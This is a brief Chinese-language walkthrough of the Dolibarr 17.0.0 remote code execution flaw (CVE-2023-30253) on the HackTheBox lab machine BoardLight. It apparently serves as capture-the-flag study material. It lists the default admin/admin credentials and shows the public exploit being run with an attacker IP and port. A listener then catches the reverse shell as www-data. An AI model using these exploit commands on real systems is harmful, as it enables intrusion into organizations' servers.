CVE-2023-30253 Dolibarr RCE

Dolibarr 是一个开源的企业资源计划 (ERP) 和客户关系管理 (CRM) 平台,其源代码可在 GitHub 上获取。

1. 快速利用

版本:17.0.0
要求: 账号密码 默认账号密码 admin / admin

exp
GitHub - nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253: Reverse Shell POC exploit for Dolibarr <= 17.0.0 (CVE-2023-30253), PHP Code Injection

┌──(root㉿kali)-[~/Desktop/htb/BoardLight/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253]
└─# python exploit.py  http://crm.board.htb admin admin 10.10.14.74 4444
[*] Trying authentication...
[**] Login: admin
[**] Password: admin
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection

┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# penelope -p 4444
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.8.18 • 172.19.0.1 • 172.17.0.1 • 10.10.14.74
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from boardlight~10.129.9.143-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/sessions/boardlight~10.129.9.143-Linux-x86_64/2025_12_19-09_27_17-237.log 📜
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$ whoami
www-data

2. 细节

https://www.tinextacyber.com/security-advisory-dolibarr-17-0-0/
HTB: BoardLight | 0xdf hacks stuff
拥有“读取网站内容”和“创建/修改网站内容(HTML 和 JavaScript 内容)”权限的用户能够“通过 PHP 代码注入绕过应用程序限制,从而执行远程命令”。也就是说,用户原本不应该能够创建 PHP 页面,但此漏洞允许他们这样做。